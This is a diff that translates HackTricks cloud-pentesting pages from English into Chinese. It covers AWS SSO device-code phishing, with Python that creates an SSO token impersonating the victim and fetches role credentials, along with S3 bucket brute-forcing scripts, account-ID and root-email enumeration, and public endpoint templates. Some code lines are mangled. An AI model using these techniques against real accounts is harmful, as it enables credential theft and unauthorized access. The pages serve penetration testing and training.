-4. **Get SSO access token** - -If the victim accepted the prompt, run this code to **generate a SSO token impersonating the user**: +4. **获取SSO访问令牌** +如果受害者接受了提示,运行此代码以**生成一个冒充用户的SSO令牌**: ```python token_response = sso_oidc.create_token( - clientId=client_id, - clientSecret=client_secret, - grantType="urn:ietf:params:oauth:grant-type:device_code", - deviceCode=deviceCode +clientId=client_id, +clientSecret=client_secret, +grantType="urn:ietf:params:oauth:grant-type:device_code", +deviceCode=deviceCode ) sso_token = token_response.get('accessToken') ``` +SSO 访问令牌是 **有效期为 8 小时**。 -The SSO access token is **valid for 8h**. - -5. **Impersonate the user** - +5. **冒充用户** ```python sso_client = boto3.client('sso', region_name=REGION) # List accounts where the user has access aws_accounts_response = sso_client.list_accounts( - accessToken=sso_token, - maxResults=100 +accessToken=sso_token, +maxResults=100 ) aws_accounts_response.get('accountList', []) # Get roles inside an account roles_response = sso_client.list_account_roles( - accessToken=sso_token, - accountId= +accessToken=sso_token, +accountId= ) roles_response.get('roleList', []) # Get credentials over a role sts_creds = sso_client.get_role_credentials( - accessToken=sso_token, - roleName=, - accountId= +accessToken=sso_token, +roleName=, +accountId= ) sts_creds.get('roleCredentials') ``` +### 针对不可钓鱼的 MFA 进行钓鱼 -### Phishing the unphisable MFA +有趣的是,之前的攻击 **即使在使用“不可钓鱼的 MFA”(webAuth)的情况下也能奏效**。这是因为之前的 **工作流程从未离开所使用的 OAuth 域**。与其他钓鱼攻击不同,用户需要替代登录域,在设备代码工作流程中,**代码由设备已知**,用户即使在不同的机器上也可以登录。如果接受了提示,设备仅通过 **知道初始代码**,就能够 **为用户检索凭据**。 -It's fun to know that the previous attack **works even if an "unphisable MFA" (webAuth) is being used**. This is because the previous **workflow never leaves the used OAuth domain**. Not like in other phishing attacks where the user needs to supplant the login domain, in the case the device code workflow is prepared so a **code is known by a device** and the user can login even in a different machine. If accepted the prompt, the device, just by **knowing the initial code**, is going to be able to **retrieve credentials** for the user. +有关更多信息,请 [**查看此帖子**](https://mjg59.dreamwidth.org/62175.html)。 -For more info about this [**check this post**](https://mjg59.dreamwidth.org/62175.html). - -### Automatic Tools +### 自动化工具 - [https://github.com/christophetd/aws-sso-device-code-authentication](https://github.com/christophetd/aws-sso-device-code-authentication) - [https://github.com/sebastian-mora/awsssome_phish](https://github.com/sebastian-mora/awsssome_phish) -## References +## 参考资料 - [https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/](https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/) - [https://ruse.tech/blogs/aws-sso-phishing](https://ruse.tech/blogs/aws-sso-phishing) @@ -129,7 +121,3 @@ For more info about this [**check this post**](https://mjg59.dreamwidth.org/6217 - [https://ramimac.me/aws-device-auth](https://ramimac.me/aws-device-auth) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md index 38622c338..446d37850 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md @@ -1,17 +1,11 @@ -# AWS - IoT Unauthenticated Enum +# AWS - IoT 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} -### Public URL template - +### 公共 URL 模板 ``` mqtt://{random_id}.iot.{region}.amazonaws.com:8883 https://{random_id}.iot.{region}.amazonaws.com:8443 https://{random_id}.iot.{region}.amazonaws.com:443 ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md index 58b8a1309..c2bdbc577 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md @@ -2,14 +2,8 @@ {{#include ../../../banners/hacktricks-training.md}} -### Public URL template - +### 公共 URL 模板 ``` https://{random_id}.kinesisvideo.{region}.amazonaws.com ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md index 5109a2044..f150d64a2 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md @@ -2,25 +2,19 @@ {{#include ../../../banners/hacktricks-training.md}} -## Public Function URL +## 公共函数 URL -It's possible to relate a **Lambda** with a **public function URL** that anyone can access. It could contain web vulnerabilities. - -### Public URL template +可以将 **Lambda** 与任何人都可以访问的 **公共函数 URL** 关联。它可能包含网络漏洞。 +### 公共 URL 模板 ``` https://{random_id}.lambda-url.{region}.on.aws/ ``` +### 从公共 Lambda URL 获取账户 ID -### Get Account ID from public Lambda URL +就像 S3 存储桶、数据交换和 API 网关一样,可以通过公共 Lambda URL 利用 **`aws:ResourceAccount`** **策略条件键** 找到账户的账户 ID。这是通过逐个字符查找账户 ID,利用策略中 **`aws:ResourceAccount`** 部分的通配符来实现的。\ +此技术还允许获取 **标签的值**,如果你知道标签键(有一些默认的有趣标签)。 -Just like with S3 buckets, Data Exchange and API gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public lambda URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\ -This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones). - -You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation. +你可以在 [**原始研究**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) 和工具 [**conditional-love**](https://github.com/plerionhq/conditional-love/) 中找到更多信息,以自动化此利用。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md index 2bbc4fdd6..29942790f 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md @@ -1,17 +1,11 @@ -# AWS - Media Unauthenticated Enum +# AWS - 媒体未认证枚举 {{#include ../../../banners/hacktricks-training.md}} -### Public URL template - +### 公共 URL 模板 ``` https://{random_id}.mediaconvert.{region}.amazonaws.com https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel https://{random_id}.data.mediastore.{region}.amazonaws.com ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md index ab06211e2..42a71bd59 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md @@ -1,26 +1,20 @@ -# AWS - MQ Unauthenticated Enum +# AWS - MQ 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} -## Public Port +## 公共端口 ### **RabbitMQ** -In case of **RabbitMQ**, by **default public access** and ssl are enabled. But you need **credentials** to access (`amqps://.mq.us-east-1.amazonaws.com:5671`​​). Moreover, it's possible to **access the web management console** if you know the credentials in `https://b-.mq.us-east-1.amazonaws.com/` +在**RabbitMQ**的情况下,**默认情况下启用公共访问**和ssl。但是您需要**凭据**才能访问(`amqps://.mq.us-east-1.amazonaws.com:5671`​​)。此外,如果您知道凭据,可以**访问网络管理控制台**,网址为`https://b-.mq.us-east-1.amazonaws.com/` ### ActiveMQ -In case of **ActiveMQ**, by default public access and ssl are enabled, but you need credentials to access. - -### Public URL template +在**ActiveMQ**的情况下,默认情况下启用公共访问和ssl,但您需要凭据才能访问。 +### 公共URL模板 ``` https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162/ ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617 ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md index 9bbbd408d..12a5b241e 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md @@ -2,21 +2,15 @@ {{#include ../../../banners/hacktricks-training.md}} -### Public Port +### 公共端口 -It's possible to **expose the Kafka broker to the public**, but you will need **credentials**, IAM permissions or a valid certificate (depending on the auth method configured). +可以**将Kafka代理暴露给公众**,但您需要**凭据**、IAM权限或有效证书(具体取决于配置的认证方法)。 -It's also **possible to disabled authentication**, but in that case **it's not possible to directly expose** the port to the Internet. - -### Public URL template +也可以**禁用认证**,但在这种情况下**无法直接将端口暴露**给互联网。 +### 公共URL模板 ``` b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com {user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md index 218300e3f..24d95047a 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md @@ -1,23 +1,22 @@ -# AWS - RDS Unauthenticated Enum +# AWS - RDS 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} ## RDS -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-relational-database-rds-enum.md {{#endref}} -## Public Port +## 公共端口 -It's possible to give public access to the **database from the internet**. The attacker will still need to **know the username and password,** IAM access, or an **exploit** to enter in the database. +可以允许**从互联网访问数据库**。攻击者仍然需要**知道用户名和密码、**IAM 访问权限或一个**漏洞**才能进入数据库。 -## Public RDS Snapshots - -AWS allows giving **access to anyone to download RDS snapshots**. You can list these public RDS snapshots very easily from your own account: +## 公共 RDS 快照 +AWS 允许**任何人下载 RDS 快照**。您可以很容易地从自己的账户列出这些公共 RDS 快照: ```bash # Public RDS snapshots aws rds describe-db-snapshots --include-public @@ -33,16 +32,9 @@ aws rds describe-db-snapshots --snapshot-type public [--region us-west-2] ## Even if in the console appear as there are public snapshot it might be public ## snapshots from other accounts used by the current account ``` - -### Public URL template - +### 公共 URL 模板 ``` mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306 postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432 ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md index ab1577a1e..fbf15a9f0 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md @@ -2,14 +2,8 @@ {{#include ../../../banners/hacktricks-training.md}} -### Public URL template - +### 公共 URL 模板 ``` {user_provided}...redshift.amazonaws.com ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md index 28c7b1673..9560dd297 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md @@ -1,43 +1,43 @@ -# AWS - S3 Unauthenticated Enum +# AWS - S3 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} -## S3 Public Buckets +## S3 公共桶 -A bucket is considered **“public”** if **any user can list the contents** of the bucket, and **“private”** if the bucket's contents can **only be listed or written by certain users**. +如果**任何用户都可以列出**桶的内容,则该桶被视为**“公共”**,如果桶的内容**只能由某些用户列出或写入**,则被视为**“私有”**。 -Companies might have **buckets permissions miss-configured** giving access either to everything or to everyone authenticated in AWS in any account (so to anyone). Note, that even with such misconfigurations some actions might not be able to be performed as buckets might have their own access control lists (ACLs). +公司可能会有**桶权限配置错误**,导致访问权限过于宽泛,或者对任何在 AWS 中的已认证用户开放(即对任何人开放)。请注意,即使存在这样的配置错误,某些操作可能仍无法执行,因为桶可能有自己的访问控制列表(ACL)。 -**Learn about AWS-S3 misconfiguration here:** [**http://flaws.cloud**](http://flaws.cloud/) **and** [**http://flaws2.cloud/**](http://flaws2.cloud) +**在这里了解 AWS-S3 配置错误:** [**http://flaws.cloud**](http://flaws.cloud/) **和** [**http://flaws2.cloud/**](http://flaws2.cloud) -### Finding AWS Buckets +### 查找 AWS 桶 -Different methods to find when a webpage is using AWS to storage some resources: +查找网页是否使用 AWS 存储某些资源的不同方法: -#### Enumeration & OSINT: +#### 枚举与 OSINT: -- Using **wappalyzer** browser plugin -- Using burp (**spidering** the web) or by manually navigating through the page all **resources** **loaded** will be save in the History. -- **Check for resources** in domains like: +- 使用 **wappalyzer** 浏览器插件 +- 使用 burp(**爬虫**网页)或通过手动浏览页面,所有**加载的资源**将保存在历史记录中。 +- **检查资源**在以下域名中: - ``` - http://s3.amazonaws.com/[bucket_name]/ - http://[bucket_name].s3.amazonaws.com/ - ``` +``` +http://s3.amazonaws.com/[bucket_name]/ +http://[bucket_name].s3.amazonaws.com/ +``` -- Check for **CNAMES** as `resources.domain.com` might have the CNAME `bucket.s3.amazonaws.com` -- Check [https://buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/), a web with already **discovered open buckets**. -- The **bucket name** and the **bucket domain name** needs to be **the same.** - - **flaws.cloud** is in **IP** 52.92.181.107 and if you go there it redirects you to [https://aws.amazon.com/s3/](https://aws.amazon.com/s3/). Also, `dig -x 52.92.181.107` gives `s3-website-us-west-2.amazonaws.com`. - - To check it's a bucket you can also **visit** [https://flaws.cloud.s3.amazonaws.com/](https://flaws.cloud.s3.amazonaws.com/). +- 检查 **CNAMES**,如 `resources.domain.com` 可能有 CNAME `bucket.s3.amazonaws.com` +- 检查 [https://buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/),这是一个已经**发现的开放桶**的网站。 +- **桶名称**和**桶域名**需要**相同。** +- **flaws.cloud** 的 **IP** 是 52.92.181.107,如果你访问该地址,它会重定向到 [https://aws.amazon.com/s3/](https://aws.amazon.com/s3/)。此外,`dig -x 52.92.181.107` 返回 `s3-website-us-west-2.amazonaws.com`。 +- 要检查是否为桶,你也可以**访问** [https://flaws.cloud.s3.amazonaws.com/](https://flaws.cloud.s3.amazonaws.com/)。 -#### Brute-Force +#### 暴力破解 -You can find buckets by **brute-forcing name**s related to the company you are pentesting: +你可以通过**暴力破解与公司相关的名称**来查找桶: - [https://github.com/sa7mon/S3Scanner](https://github.com/sa7mon/S3Scanner) - [https://github.com/clario-tech/s3-inspector](https://github.com/clario-tech/s3-inspector) -- [https://github.com/jordanpotti/AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump) (Contains a list with potential bucket names) +- [https://github.com/jordanpotti/AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump)(包含潜在桶名称的列表) - [https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets](https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets) - [https://github.com/smaranchand/bucky](https://github.com/smaranchand/bucky) - [https://github.com/tomdev/teh_s3_bucketeers](https://github.com/tomdev/teh_s3_bucketeers) @@ -45,48 +45,47 @@ You can find buckets by **brute-forcing name**s related to the company you are p - [https://github.com/Eilonh/s3crets_scanner](https://github.com/Eilonh/s3crets_scanner) - [https://github.com/belane/CloudHunter](https://github.com/belane/CloudHunter) -
# Generate a wordlist to create permutations
+
# 生成一个单词列表以创建排列
 curl -s https://raw.githubusercontent.com/cujanovic/goaltdns/master/words.txt > /tmp/words-s3.txt.temp
 curl -s https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt >>/tmp/words-s3.txt.temp
 cat /tmp/words-s3.txt.temp | sort -u > /tmp/words-s3.txt
 
-# Generate a wordlist based on the domains and subdomains to test
-## Write those domains and subdomains in subdomains.txt
+# 基于域名和子域名生成单词列表进行测试
+## 将这些域名和子域名写入 subdomains.txt
 cat subdomains.txt > /tmp/words-hosts-s3.txt
 cat subdomains.txt | tr "." "-" >> /tmp/words-hosts-s3.txt
 cat subdomains.txt | tr "." "\n" | sort -u >> /tmp/words-hosts-s3.txt
 
-# Create permutations based in a list with the domains and subdomains to attack
+# 创建基于域名和子域名的排列列表进行攻击
 goaltdns -l /tmp/words-hosts-s3.txt -w /tmp/words-s3.txt -o /tmp/final-words-s3.txt.temp
-## The previous tool is specialized increating permutations for subdomains, lets filter that list
-### Remove lines ending with "."
+## 之前的工具专门用于创建子域名的排列,让我们过滤该列表
+### 移除以 "." 结尾的行
 cat /tmp/final-words-s3.txt.temp | grep -Ev "\.$" > /tmp/final-words-s3.txt.temp2
-### Create list without TLD
+### 创建没有 TLD 的列表
 cat /tmp/final-words-s3.txt.temp2 | sed -E 's/\.[a-zA-Z0-9]+$//' > /tmp/final-words-s3.txt.temp3
-### Create list without dots
+### 创建没有点的列表
 cat /tmp/final-words-s3.txt.temp3 | tr -d "." > /tmp/final-words-s3.txt.temp4http://phantom.s3.amazonaws.com/
-### Create list without hyphens
+### 创建没有连字符的列表
 cat /tmp/final-words-s3.txt.temp3 | tr "." "-" > /tmp/final-words-s3.txt.temp5
 
-## Generate the final wordlist
+## 生成最终单词列表
 cat /tmp/final-words-s3.txt.temp2 /tmp/final-words-s3.txt.temp3 /tmp/final-words-s3.txt.temp4 /tmp/final-words-s3.txt.temp5 | grep -v -- "-\." | awk '{print tolower($0)}' | sort -u > /tmp/final-words-s3.txt
 
-## Call s3scanner
+## 调用 s3scanner
 s3scanner --threads 100 scan --buckets-file /tmp/final-words-s3.txt  | grep bucket_exists
 
-#### Loot S3 Buckets +#### 获取 S3 桶 -Given S3 open buckets, [**BucketLoot**](https://github.com/redhuntlabs/BucketLoot) can automatically **search for interesting information**. +给定 S3 开放桶,[**BucketLoot**](https://github.com/redhuntlabs/BucketLoot) 可以自动**搜索有趣的信息**。 -### Find the Region +### 查找区域 -You can find all the supported regions by AWS in [**https://docs.aws.amazon.com/general/latest/gr/s3.html**](https://docs.aws.amazon.com/general/latest/gr/s3.html) +你可以在 [**https://docs.aws.amazon.com/general/latest/gr/s3.html**](https://docs.aws.amazon.com/general/latest/gr/s3.html) 找到 AWS 支持的所有区域。 -#### By DNS - -You can get the region of a bucket with a **`dig`** and **`nslookup`** by doing a **DNS request of the discovered IP**: +#### 通过 DNS +你可以通过**`dig`** 和 **`nslookup`** 获取桶的区域,方法是对发现的 IP 进行**DNS 请求**: ```bash dig flaws.cloud ;; ANSWER SECTION: @@ -96,31 +95,29 @@ nslookup 52.218.192.11 Non-authoritative answer: 11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com. ``` +检查解析的域名是否包含“website”。\ +您可以通过访问以下地址访问静态网站:`flaws.cloud.s3-website-us-west-2.amazonaws.com`\ +或者您可以通过访问以下地址访问存储桶:`flaws.cloud.s3-us-west-2.amazonaws.com` -Check that the resolved domain have the word "website".\ -You can access the static website going to: `flaws.cloud.s3-website-us-west-2.amazonaws.com`\ -or you can access the bucket visiting: `flaws.cloud.s3-us-west-2.amazonaws.com` +#### 通过尝试 -#### By Trying - -If you try to access a bucket, but in the **domain name you specify another region** (for example the bucket is in `bucket.s3.amazonaws.com` but you try to access `bucket.s3-website-us-west-2.amazonaws.com`, then you will be **indicated to the correct location**: +如果您尝试访问一个存储桶,但在**域名中指定了另一个区域**(例如存储桶在`bucket.s3.amazonaws.com`,但您尝试访问`bucket.s3-website-us-west-2.amazonaws.com`,那么您将被**指向正确的位置**: ![](<../../../images/image (106).png>) -### Enumerating the bucket +### 枚举存储桶 -To test the openness of the bucket a user can just enter the URL in their web browser. A private bucket will respond with "Access Denied". A public bucket will list the first 1,000 objects that have been stored. +要测试存储桶的开放性,用户只需在其网页浏览器中输入URL。私有存储桶将响应“访问被拒绝”。公共存储桶将列出前1,000个已存储的对象。 -Open to everyone: +对所有人开放: ![](<../../../images/image (201).png>) -Private: +私有: ![](<../../../images/image (83).png>) -You can also check this with the cli: - +您还可以通过cli检查此内容: ```bash #Use --no-sign-request for check Everyones permissions #Use --profile to indicate the AWS profile(keys) that youwant to use: Check for "Any Authenticated AWS User" permissions @@ -128,22 +125,18 @@ You can also check this with the cli: #Opcionally you can select the region if you now it aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile ] [ --recursive] [--region us-west-2] ``` +如果存储桶没有域名,在尝试枚举时,**只需输入存储桶名称**,而不是整个 AWSs3 域名。示例: `s3://` -If the bucket doesn't have a domain name, when trying to enumerate it, **only put the bucket name** and not the whole AWSs3 domain. Example: `s3://` - -### Public URL template - +### 公共 URL 模板 ``` https://{user_provided}.s3.amazonaws.com ``` +### 从公共桶获取账户ID -### Get Account ID from public Bucket - -It's possible to determine an AWS account by taking advantage of the new **`S3:ResourceAccount`** **Policy Condition Key**. This condition **restricts access based on the S3 bucket** an account is in (other account-based policies restrict based on the account the requesting principal is in).\ -And because the policy can contain **wildcards** it's possible to find the account number **just one number at a time**. - -This tool automates the process: +可以通过利用新的 **`S3:ResourceAccount`** **策略条件键** 来确定一个AWS账户。这个条件 **基于账户所在的S3桶限制访问**(其他基于账户的策略是基于请求主体所在的账户)。\ +由于策略可以包含 **通配符**,因此可以 **一次找到一个数字** 来查找账户号码。 +这个工具自动化了这个过程: ```bash # Installation pipx install s3-account-search @@ -153,13 +146,11 @@ s3-account-search arn:aws:iam::123456789012:role/s3_read s3://my-bucket # With an object s3-account-search arn:aws:iam::123456789012:role/s3_read s3://my-bucket/path/to/object.ext ``` +这种技术同样适用于 API Gateway URLs、Lambda URLs、Data Exchange 数据集,甚至可以获取标签的值(如果你知道标签键)。你可以在 [**原始研究**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) 和工具 [**conditional-love**](https://github.com/plerionhq/conditional-love/) 中找到更多信息,以自动化此利用。 -This technique also works with API Gateway URLs, Lambda URLs, Data Exchange data sets and even to get the value of tags (if you know the tag key). You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation. - -### Confirming a bucket belongs to an AWS account - -As explained in [**this blog post**](https://blog.plerion.com/things-you-wish-you-didnt-need-to-know-about-s3/)**, if you have permissions to list a bucket** it’s possible to confirm an accountID the bucket belongs to by sending a request like: +### 确认一个桶属于 AWS 账户 +正如在 [**这篇博客文章**](https://blog.plerion.com/things-you-wish-you-didnt-need-to-know-about-s3/) 中解释的那样,**如果你有列出桶的权限**,可以通过发送类似以下请求来确认桶所属的 accountID: ```bash curl -X GET "[bucketname].amazonaws.com/" \ -H "x-amz-expected-bucket-owner: [correct-account-id]" @@ -167,41 +158,34 @@ curl -X GET "[bucketname].amazonaws.com/" \ ... ``` +如果错误是“访问被拒绝”,则意味着账户 ID 错误。 -If the error is an “Access Denied” it means that the account ID was wrong. - -### Used Emails as root account enumeration - -As explained in [**this blog post**](https://blog.plerion.com/things-you-wish-you-didnt-need-to-know-about-s3/), it's possible to check if an email address is related to any AWS account by **trying to grant an email permissions** over a S3 bucket via ACLs. If this doesn't trigger an error, it means that the email is a root user of some AWS account: +### 使用电子邮件作为根账户枚举 +正如在[**这篇博客文章**](https://blog.plerion.com/things-you-wish-you-didnt-need-to-know-about-s3/)中所解释的,可以通过**尝试授予电子邮件对 S3 存储桶的权限**来检查某个电子邮件地址是否与任何 AWS 账户相关。如果这没有触发错误,则意味着该电子邮件是某个 AWS 账户的根用户: ```python s3_client.put_bucket_acl( - Bucket=bucket_name, - AccessControlPolicy={ - 'Grants': [ - { - 'Grantee': { - 'EmailAddress': 'some@emailtotest.com', - 'Type': 'AmazonCustomerByEmail', - }, - 'Permission': 'READ' - }, - ], - 'Owner': { - 'DisplayName': 'Whatever', - 'ID': 'c3d78ab5093a9ab8a5184de715d409c2ab5a0e2da66f08c2f6cc5c0bdeadbeef' - } - } +Bucket=bucket_name, +AccessControlPolicy={ +'Grants': [ +{ +'Grantee': { +'EmailAddress': 'some@emailtotest.com', +'Type': 'AmazonCustomerByEmail', +}, +'Permission': 'READ' +}, +], +'Owner': { +'DisplayName': 'Whatever', +'ID': 'c3d78ab5093a9ab8a5184de715d409c2ab5a0e2da66f08c2f6cc5c0bdeadbeef' +} +} ) ``` - -## References +## 参考文献 - [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) - [https://cloudar.be/awsblog/finding-the-account-id-of-any-public-s3-bucket/](https://cloudar.be/awsblog/finding-the-account-id-of-any-public-s3-bucket/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md index 7978eff36..f034cd7b7 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md @@ -1,25 +1,21 @@ -# AWS - SNS Unauthenticated Enum +# AWS - SNS 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} ## SNS -For more information about SNS check: +有关 SNS 的更多信息,请查看: {{#ref}} ../aws-services/aws-sns-enum.md {{#endref}} -### Open to All +### 对所有人开放 -When you configure a SNS topic from the web console it's possible to indicate that **Everyone can publish and subscribe** to the topic: +当您从网络控制台配置 SNS 主题时,可以指示 **每个人都可以发布和订阅** 该主题:
-So if you **find the ARN of topics** inside the account (or brute forcing potential names for topics) you can **check** if you can **publish** or **subscribe** to **them**. +因此,如果您 **找到账户内主题的 ARN**(或暴力破解潜在的主题名称),您可以 **检查** 是否可以 **发布** 或 **订阅** **它们**。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md index a5006a63b..af874b9ff 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md @@ -1,27 +1,21 @@ -# AWS - SQS Unauthenticated Enum +# AWS - SQS 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} ## SQS -For more information about SQS check: +有关 SQS 的更多信息,请查看: {{#ref}} ../aws-services/aws-sqs-and-sns-enum.md {{#endref}} -### Public URL template - +### 公共 URL 模板 ``` https://sqs.[region].amazonaws.com/[account-id]/{user_provided} ``` +### 检查权限 -### Check Permissions - -It's possible to misconfigure a SQS queue policy and grant permissions to everyone in AWS to send and receive messages, so if you get the ARN of queues try if you can access them. +可能会错误配置 SQS 队列策略,并授予 AWS 中的所有人发送和接收消息的权限,因此如果您获得队列的 ARN,请尝试访问它们。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/README.md b/src/pentesting-cloud/azure-security/README.md index 9d2de65fc..9db2ec363 100644 --- a/src/pentesting-cloud/azure-security/README.md +++ b/src/pentesting-cloud/azure-security/README.md @@ -2,86 +2,85 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 {{#ref}} az-basic-information/ {{#endref}} -## Azure Pentester/Red Team Methodology +## Azure 渗透测试/红队方法论 -In order to audit an AZURE environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal Azure services and **external services** connected. +为了审计 AZURE 环境,了解以下内容非常重要:使用了哪些 **服务**,暴露了什么,谁有 **访问权限**,以及内部 Azure 服务和 **外部服务** 是如何连接的。 -From a Red Team point of view, the **first step to compromise an Azure environment** is to manage to obtain some **credentials** for Azure AD. Here you have some ideas on how to do that: +从红队的角度来看,**攻陷 Azure 环境的第一步**是设法获取一些 Azure AD 的 **凭证**。以下是一些获取凭证的思路: -- **Leaks** in github (or similar) - OSINT -- **Social** Engineering -- **Password** reuse (password leaks) -- Vulnerabilities in Azure-Hosted 